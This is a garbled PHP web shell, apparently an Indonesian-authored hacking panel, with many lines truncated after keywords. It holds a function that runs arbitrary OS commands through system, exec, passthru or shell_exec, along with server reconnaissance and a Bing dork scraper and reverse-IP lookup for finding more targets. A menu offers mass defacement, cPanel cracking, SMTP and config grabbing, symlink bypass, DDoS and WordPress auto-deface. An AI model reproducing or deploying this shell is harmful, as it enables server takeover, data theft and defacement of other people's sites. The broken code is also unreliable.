" .
} else {
return "" .
}
}
function r
if
return "" .
} else {
return "" .
}
}
function exe
if
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return
}
}
function perms
$perms = fileperms($file);
if
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return
}
function hdd
if
return sprintf
elseif
return sprintf
elseif
return sprintf
else
return
}
function ambilKata
if
if
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return
}
function getsource
$curl = curl_init($url);
curl_setopt
curl_setopt
curl_setopt
curl_setopt
$content = curl_exec($curl);
curl_close
return
}
function bing
$npage = 1;
$npages = 30000;
$allLinks = array();
$lll = array();
while
$x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
if
preg_match_all
foreach
$npage = $npage + 10;
if
} else break;
}
$URLs = array();
foreach
$exp = explode("/", $url);
$URLs[] = $exp[2];
}
$array = array_filter($URLs);
$array = array_unique($array);
$sss = count(array_unique($array));
foreach
echo
}
}
function reverse
$ch = curl_init("http://domains.yougetsignal.com/domains.php");
curl_setopt
curl_setopt
curl_setopt
curl_setopt
$resp = curl_exec($ch);
$resp = str_replace("[","", str_replace("]","", str_replace("""","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
$array = explode(",,", $resp);
unset
foreach
$lnk = "http://$lnk";
$lnk = str_replace(",", "", $lnk);
echo
ob_flush
flush
}
curl_close
}
if
function idx_ss
return is_array
}
$_POST = idx_ss($_POST);
$_COOKIE = idx_ss($_COOKIE);
}
if
$dir = $_GET['dir'];
chdir
} else {
$dir = getcwd();
}
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$dir = str_replace("","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "ON" : "OFF";
$curl = (function_exists('curl_version')) ? "ON" : "OFF";
$wget = (exe('wget --help')) ? "ON" : "OFF";
$perl = (exe('perl --help')) ? "ON" : "OFF";
$python = (exe('python --help')) ? "ON" : "OFF";
$show_ds = (!empty($ds)) ? "$ds" : "NONE";
if
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "System: " .
echo "User: " .
echo "Server IP: " .
echo "HDD: $used / $total ( Free: $freespace )
"
echo "Safe Mode: $sm
"
echo "Disable Functions: $show_ds
"
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
"
echo "Current DIR: "
foreach
echo "$cdir/"
}
echo " [ " .w
echo
echo "
"
echo ""
echo "Home"
echo "Upload"
echo "Command"
echo "Mass Deface"
echo "Mass Delete"
echo "Config"
echo "Jumping"
echo "CPanel Crack"
echo "SMTP Grabber"
echo "CGI Telnet "
echo "
"
echo "
Fake Root"
echo "KRDP Shell"
echo "Auto Edit User"
echo "Auto Edit Title"
echo "Zone-H"
echo "WordPress Auto Deface"
echo "CFTP Auto Deface"
echo "
KRDP Shell"
echo "network"
echo "about"
echo "Adminer"
echo "Tool"
echo "Admin Finder"
echo "symlink"
echo "Auto Deface"
echo "
Bypass"
echo "CSRF Online"
echo "Encode Decode"
echo "DDos"
echo "Shell Scanner"
echo "Logout"
echo "
"
echo ""
if
unset
echo ""
} elseif($_GET['do'] == 'upload') {
echo "
| Klik Ini" } ?> |